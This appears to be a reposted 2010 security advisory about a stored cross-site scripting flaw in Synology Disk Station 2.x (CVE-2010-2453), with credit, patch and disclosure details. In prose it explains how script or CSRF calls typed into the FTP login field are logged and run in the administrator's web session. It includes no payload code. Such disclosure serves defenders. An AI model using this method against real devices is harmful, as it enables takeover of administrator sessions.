|
|
|
|
| |
Credit:
The information has been provided by Rodrigo Rubira Branco .
The original article can be found at: http://seclists.org/fulldisclosure/2010/Sep/369
|
| |
Vulnerable Systems:
* Synology Disk Station version 2.x
There are four steps for exploitation, specified here together with the identified problem:
1. The attacker can inject malicious input from the FTP login console. As the authentication credentials are inappropriate the FTP authentication module generates error and the requisite input is logged in to the web interface of the disk station.
2. Secondly the FTP logging module is not designed appropriately and the content comes from the FTP login console is directly placed into the log window without verification of the Content-Type parameter. The content is allowed to be rendered as HTML, Script etc. An attacker can inject malicious HTML tags, DOM calls, third part y scripts, CSRF calls that gets executed in the context of logged in account which is administering it.
3. Usually log mechanism is handled by the admin account. The chances of code execution and injection fulfillment are high within full privileges as of administrator. So any code injected by the attacker becomes persistent in most of the cases and remain there for execution. Moreover CSRF code with malicious calls can be executed without user interaction.
4. Attacker has to be well versed in directory structure of the disk station manager so that injections can be made according to that and further operations can be performed. The FTP servers accept username string upto 80-100 characters which is good enough to craft injections to get the things done The scripts can be inserted from local domain or LAN or third party source to inject arbitrary code.
Patch Availability:
Synology issued an update for this vulnerability in the release DSM3.0-1337.
CVE Information:
CVE-2010-2453
Disclosure Timeline:
26 Sep 2010 - Advisory published
|
|
|
|
|
